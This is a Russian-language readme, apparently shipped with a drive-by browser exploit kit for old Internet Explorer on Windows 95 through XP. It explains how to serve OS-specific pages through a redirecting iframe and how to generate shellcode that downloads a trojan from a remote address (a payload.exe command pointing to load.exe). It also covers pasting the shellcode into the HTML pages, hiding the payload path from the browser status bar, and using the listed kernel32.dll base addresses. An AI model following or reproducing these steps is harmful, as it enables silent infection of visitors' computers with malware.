запускаем index.html в нём iframe, который редиректит взависимости от операционки, ставит куки 98.html, xp_ru.html, xp_en.html.... По другим уже сам разберешся. Как делать шел-коды: 1)В payload.bat пишем адрес к трояну 2)запускаем payload.bat, который записывает в папки 98-EN-RU-0xBFF70000, XP-EN-0x77F60000, XP-RU-0x7C800000 соответствующие шел-коды 3) запускаем beta.bat, который переписывает шел-коды в utf-16 файлы 98_sc_utf16.txt, xp-en_sc_utf16.txt, xp-ru_sc_utf16.txt в соответствущих папках 4) правим файлы 98.html, xp_ru.html, xp_en.html, заменяя !!!shell_code!!! на шел кода, только без ковычек копируй из текста! следует обратить внимание в этих файлах на строку window.status = "FUCKING..."; (можно придумать что-нибудь получше, например url какой-нибудь) поскольку рилоад длится прилично, это для скрытия пути к ним в статусной строке браузера перед повторным тест-запуском удалять куки(разкомментировать SetCookie() в iframe.html) например E:\Documents and Settings\Admin\Cookies\admin@~~local~~[1].txt желательно перезагрузить компьютер, так при повторном эксплойте система виснет сильнее, ИЕ может выдать ошибку без срабатывания эксплойта сначала просто можно проверить шел-код, без ИЕ запустить test_shell_code.bat или test_shell_code.exe XP-RU-0x7C800000\xp-ru.sc Win95 (3rd release) - 0xBFF70000 Win98 (1st and 2nd editions) - 0xBFF70000 WinME - 0xBFF60000 WinNT (service pack 4 and 5) - 0x77F00000 WinXP - 0x77F60000 Win2K - 0x77E70000 это адреса kernel32.dll для EN, остальные можешь поискать в гугле, потом просто параметром в payload.bat поставишь ( payload.exe 98-EN-RU-0xBFF70000\98.sc http://xxx/load.exe -C адрес)